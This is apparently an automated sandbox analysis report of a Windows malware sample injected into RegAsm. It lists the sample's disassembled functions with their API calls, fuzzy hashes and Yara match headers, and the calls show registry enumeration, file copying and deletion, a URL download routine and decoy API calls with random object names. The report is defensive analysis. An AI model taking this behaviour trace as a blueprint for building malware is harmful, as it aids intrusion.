                                                                • LocalFree.KERNEL32(00000000), ref: 00408EFA
                                                                • LocalFree.KERNEL32(?), ref: 00408F01
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,00000000), ref: 00409016
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,000000FF), ref: 00409050
                                                                • LocalFree.KERNEL32(00000000), ref: 00409068
                                                                • LocalFree.KERNEL32(?), ref: 00409251
                                                                • CloseHandle.KERNEL32(?), ref: 0040925A
                                                                • LocalFree.KERNEL32(00000000), ref: 0040926C
                                                                • LocalFree.KERNEL32(?), ref: 00409277
                                                                • LocalFree.KERNEL32(00000000), ref: 00409283
                                                                • DeleteFileW.KERNEL32(?), ref: 0040928A
                                                                • LocalFree.KERNEL32(?), ref: 00409291
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$TimerWaitable$EventFile$ByteCancelCharCloseDebugEnvironmentErrorHandleLastMultiMutexOpenOutputReleaseSemaphoreStringVariableWide$AllocCopyDeleteMappingReset
                                                                • String ID: l(A
                                                                • API String ID: 3886969593-3792319738
                                                                • Opcode ID: ece79f7f13c2a3c351533000580750d81cc3f75b182dfe6605b43a7ed225776a
                                                                • Instruction ID: bd68ba429ce62d2ea9d88fc7609d36d2ad3139e388d301e945caf8a1526559ae
                                                                • Opcode Fuzzy Hash: ece79f7f13c2a3c351533000580750d81cc3f75b182dfe6605b43a7ed225776a
                                                                • Instruction Fuzzy Hash: DEE15171A00606EFDB159FE4DC85AEEBBB5FF89310F108039E915B72A0DB749D018B68
                                                                Function 0040D24A Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 321registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • RegEnumKeyExW.KERNEL32(?,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,?,0040D775), ref: 0040D2EC
                                                                • LocalFree.KERNEL32(00000000,?,?,0040D775), ref: 0040D317
                                                                • RegQueryValueExW.KERNEL32(?,?,00000000,000F003F,00000000,?,?,?,0040D775), ref: 0040D370
                                                                • RegQueryValueExW.KERNEL32(?,?,00000000,000F003F,?,?,?,?,0040D775), ref: 0040D3A7
                                                                • wsprintfW.USER32 ref: 0040D3C7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$LocalTimerWaitable$Event$AllocCancelDebugEnvironmentErrorFreeLastMutexOutputQueryStringValueVariablelstrlen$ChangeCloseEnumFileFindMappingNotificationReleaseResetwsprintf
                                                                • String ID: ?
                                                                • API String ID: 107528893-1684325040
                                                                • Opcode ID: 866e854a61998b926be0167884f4b9ecdd051fac35b8266df4b92aba4a5421f8
                                                                • Instruction ID: a320b4627380f3cf421818fa9c49cbd6b3779f8cfa3f4d55fa2deee90516c08e
                                                                • Opcode Fuzzy Hash: 866e854a61998b926be0167884f4b9ecdd051fac35b8266df4b92aba4a5421f8
                                                                • Instruction Fuzzy Hash: 1CC10971900609EFDB01DFE5DC84EEEBBB9FF89354B108025FA15A7260D7749A04DBA8
                                                                Function 0040FFE8 Relevance: 31.6, APIs: 25, Instructions: 345memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410046
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410060
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0041007B
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410096
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004100B1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocLocal
                                                                • String ID:
                                                                • API String ID: 3494564517-0
                                                                • Opcode ID: 8dd10160b69f31a5081b5218dc1a3145fb19c0c625ad966f85560929da56cec9
                                                                • Instruction ID: 11524ebab8a14aa74c97d440e465f4c5a2ba8a4fd552360fa20472e745bdcb13
                                                                • Opcode Fuzzy Hash: 8dd10160b69f31a5081b5218dc1a3145fb19c0c625ad966f85560929da56cec9
                                                                • Instruction Fuzzy Hash: 7BC13E76A00605EFDB059BE4DC49EEE7BB5FB8C310F048169F915A32A0DB745D40CBA8
                                                                Function 00406D6E Relevance: 30.3, APIs: 24, Instructions: 302COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93fa53d779b8a8f9422c7ca6be1aa4e9fbabd13baf3c85b8cc047af4398e11ba
                                                                • Instruction ID: 4f1643dcfd30c6a50a91e920e49a988ff4d8f275d1b60a1b348a400ccb7e8a08
                                                                • Opcode Fuzzy Hash: 93fa53d779b8a8f9422c7ca6be1aa4e9fbabd13baf3c85b8cc047af4398e11ba
                                                                • Instruction Fuzzy Hash: 68A16D72A00606EFDB019BE8DC45EEE7BB5FB88310F108175F615F32A0DB7459109BA9
                                                                Function 0040D8AA Relevance: 30.3, APIs: 24, Instructions: 302COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d509ff70e6012854a4a03a1e5665b67b7197595f144031b06b05e926ce52f41
                                                                • Instruction ID: 5fd095dea32d1f3e5c6e388cd404f744093c6d97d12969734ecbefdca46d245b
                                                                • Opcode Fuzzy Hash: 1d509ff70e6012854a4a03a1e5665b67b7197595f144031b06b05e926ce52f41
                                                                • Instruction Fuzzy Hash: 2DA14B72A00605EFDB019BE8DC45EEE7BB5FB89310F108165F625E72A0DB7859019BA8
                                                                Function 0040C6FE Relevance: 30.3, APIs: 24, Instructions: 301COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 056b4cd8d061cb52ce542f4b24b122248dc22d6125924c9f1f6bf7f01651aa34
                                                                • Instruction ID: 13da97832414a168592ce56d605b8e9f79e8c67bd7c74ebe53a79e624a953ced
                                                                • Opcode Fuzzy Hash: 056b4cd8d061cb52ce542f4b24b122248dc22d6125924c9f1f6bf7f01651aa34
                                                                • Instruction Fuzzy Hash: E2A15172A00606EFDB019BE8DC85EEE7BB5FB89310F108275F615F71A0DB7459019BA8
                                                                Function 0040BCBF Relevance: 22.7, APIs: 18, Instructions: 247memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040BCE0
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040BD0C
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040BD25
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040BD40
                                                                • LocalFree.KERNEL32(?), ref: 0040BE97
                                                                • LocalFree.KERNEL32(?), ref: 0040BEA5
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BEBC
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BEC7
                                                                • LocalFree.KERNELBASE(00000000), ref: 0040BED2
                                                                • LocalFree.KERNELBASE(00000000), ref: 0040BF02
                                                                • LocalFree.KERNEL32(?), ref: 0040BF18
                                                                • LocalFree.KERNEL32(?), ref: 0040BF30
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BF3F
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BF4A
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BF55
                                                                • LocalFree.KERNEL32(?), ref: 0040BF67
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BF76
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BF85
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 3098330729-0
                                                                • Opcode ID: d9f525160c7aad5228963bae17d2973807545342d96ec6fef54fdc36a1714a97
                                                                • Instruction ID: d426cc0ec6e2fbc0d71ee9e827e17f567b9ab60ab20955ec0f64d222a8285b76
                                                                • Opcode Fuzzy Hash: d9f525160c7aad5228963bae17d2973807545342d96ec6fef54fdc36a1714a97
                                                                • Instruction Fuzzy Hash: D8812371A00606DBDB149BA5DC85AEF7BB5FB88700B14847AE915F3390DB789D009BEC
                                                                Function 0040BAF9 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 134filenetworkstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000), ref: 0040BB87
                                                                • InternetOpenUrlW.WININET(0000002F,?,0040BE8E,00000000), ref: 0040BBD8
                                                                • CreateFileW.KERNEL32(0040BE8E,40000000,00000000,00000000,00000002,08000000,00000000), ref: 0040BBFA
                                                                • InternetReadFile.WININET(00000000,?,00000800,0000002F), ref: 0040BC1A
                                                                • WriteFile.KERNEL32(00000000,?,00000000,00000073,00000000), ref: 0040BC3A
                                                                • InternetReadFile.WININET(00000000,?,00000800,00000000), ref: 0040BC56
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BC5D
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040BC6B
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BC72
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Internet$FreeLocalRead$ChangeCloseCreateFindNotificationOpenWritelstrlen
                                                                • String ID: /$MrBidenNeverKnow$s
                                                                • API String ID: 1040460322-530527598
                                                                • Opcode ID: ce2d80fdc12d3dc36e2315849c6dc5cd4829747b08fb00d41075e1891cc61fa1
                                                                • Instruction ID: 896319c6afa3528012f23cef34ff71f049749deff51ff49bef5061a5860f1f90
                                                                • Opcode Fuzzy Hash: ce2d80fdc12d3dc36e2315849c6dc5cd4829747b08fb00d41075e1891cc61fa1
                                                                • Instruction Fuzzy Hash: A9419E71900605FEEB14ABA4CC45FFB77B8EB88304F10C169E515A7190EB74AE85CBA8
                                                                Function 00401ACC Relevance: 19.7, APIs: 13, Instructions: 151memoryfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathCombineW.SHLWAPI(00000000,?,?), ref: 00401B0D
                                                                • PathCombineW.SHLWAPI(?,?), ref: 00401B32
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401B4A
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00401B67
                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00401B82
                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00401B9C
                                                                • LocalFree.KERNEL32(?), ref: 00401BE1
                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00401BF1
                                                                • LocalFree.KERNELBASE(?), ref: 00401C2B
                                                                • CloseHandle.KERNEL32(?), ref: 00401C37
                                                                • LocalFree.KERNEL32(?), ref: 00401C41
                                                                • LocalFree.KERNEL32(00000000), ref: 00401C48
                                                                • LocalFree.KERNEL32(?), ref: 00401C51
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Alloc$CombineFilePath$CloseCreateHandleRead
                                                                • String ID:
                                                                • API String ID: 3393752706-0
                                                                • Opcode ID: 19f98ea32b6ef18ada5ff6ffdf8c7fb27f7198e15326513d4eaa2f1a065c4da8
                                                                • Instruction ID: 745d95f4ba9b6c4e5cdb5560b762c09b7acc99d982d7be964736fae3e912c6fa
                                                                • Opcode Fuzzy Hash: 19f98ea32b6ef18ada5ff6ffdf8c7fb27f7198e15326513d4eaa2f1a065c4da8
                                                                • Instruction Fuzzy Hash: 8B512E75A00605EFDB15DFE4ED45EEE7BB8FB88300B108069FA04A7260DB749D10CBA8
                                                                Function 00408B7F Relevance: 16.7, APIs: 11, Instructions: 186filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00408BEB
                                                                • LocalFree.KERNEL32(00000000), ref: 00408C2B
                                                                • wsprintfW.USER32 ref: 00408D11
                                                                • lstrlenW.KERNEL32 ref: 00408D1E
                                                                • LocalFree.KERNEL32(004081BE), ref: 00408D3B
                                                                • DeleteFileW.KERNEL32(?), ref: 00408D75
                                                                • LocalFree.KERNEL32(?), ref: 00408D80
                                                                • LocalFree.KERNEL32(00000000), ref: 00408D8B
                                                                • LocalFree.KERNEL32(00000000), ref: 00408D97
                                                                • DeleteFileW.KERNEL32(?), ref: 00408D9E
                                                                • LocalFree.KERNEL32(?), ref: 00408DA5
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$FileTimerWaitable$Event$CancelDebugDeleteEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseCopyHandleMappingResetlstrlenwsprintf
                                                                • String ID:
                                                                • API String ID: 4164103679-0
                                                                • Opcode ID: 85eafa5120e9989eda7141044d1e3ae41b335f45a6fdc1514c10a1bf3b98dc0d
                                                                • Instruction ID: c9198239f7c2b5a66ba9cb46f8b1bed5498c225b6b076db5169d79ee3b3ce09a
                                                                • Opcode Fuzzy Hash: 85eafa5120e9989eda7141044d1e3ae41b335f45a6fdc1514c10a1bf3b98dc0d
                                                                • Instruction Fuzzy Hash: 39611D32900605FFDB159FA0EC85AEE7BB6EF88310F108139F915A72A0DB759940DB58
                                                                Function 0040D5E0 Relevance: 16.5, APIs: 13, Instructions: 258COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 02b2f53f5938795898ec0cd5702e6ca49f080c5a7bead582ea952ae9c4efe489
                                                                • Instruction ID: ba87ff7ffdea6b00fdeabc2726f6f2bfad5139be0e12a858a036ad0614a95326
                                                                • Opcode Fuzzy Hash: 02b2f53f5938795898ec0cd5702e6ca49f080c5a7bead582ea952ae9c4efe489
                                                                • Instruction Fuzzy Hash: 99815472900605FFDB00DBE5DC45EEE7BB9EB88314B10853AF915E72D0DB3899058BA8
                                                                Function 0040929E Relevance: 10.6, APIs: 7, Instructions: 145fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00409303
                                                                • LocalFree.KERNEL32(00000000), ref: 00409347
                                                                • LocalFree.KERNEL32(00000000), ref: 00409420
                                                                • LocalFree.KERNEL32(00000000), ref: 0040942B
                                                                • LocalFree.KERNEL32(00000000), ref: 00409437
                                                                • DeleteFileW.KERNEL32(00000000), ref: 0040943E
                                                                • LocalFree.KERNEL32(00000000), ref: 00409445
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$CreateFree$TimerWaitable$EventFile$CancelDebugEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseCopyDeleteHandleMappingReset
                                                                • String ID:
                                                                • API String ID: 4211121647-0
                                                                • Opcode ID: 1699a62e77ca08c1f1fcfcd92d13b57b1defff0b7606c63c95247b7ca62daeea
                                                                • Instruction ID: f966f97e833fa7e95d570ddb0d8a32ecf7dc763458c9a7285bd4e56c5124389c
                                                                • Opcode Fuzzy Hash: 1699a62e77ca08c1f1fcfcd92d13b57b1defff0b7606c63c95247b7ca62daeea
                                                                • Instruction Fuzzy Hash: 92416D31600611EFCB159FA4EC89AEE3BB6FF89310B10C079F815A72A5DB749D01DB59
                                                                Function 0040CDA5 Relevance: 7.6, APIs: 5, Instructions: 68registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000104,?,?,?,0040D73C,?), ref: 0040CE08
                                                                • LocalFree.KERNEL32(00000000,?,?,?,0040D73C,?), ref: 0040CE24
                                                                • wsprintfW.USER32 ref: 0040CE36
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
